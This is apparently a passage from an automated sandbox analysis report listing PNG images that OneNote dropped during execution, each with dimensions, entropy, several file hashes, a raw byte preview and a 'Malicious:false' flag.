                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
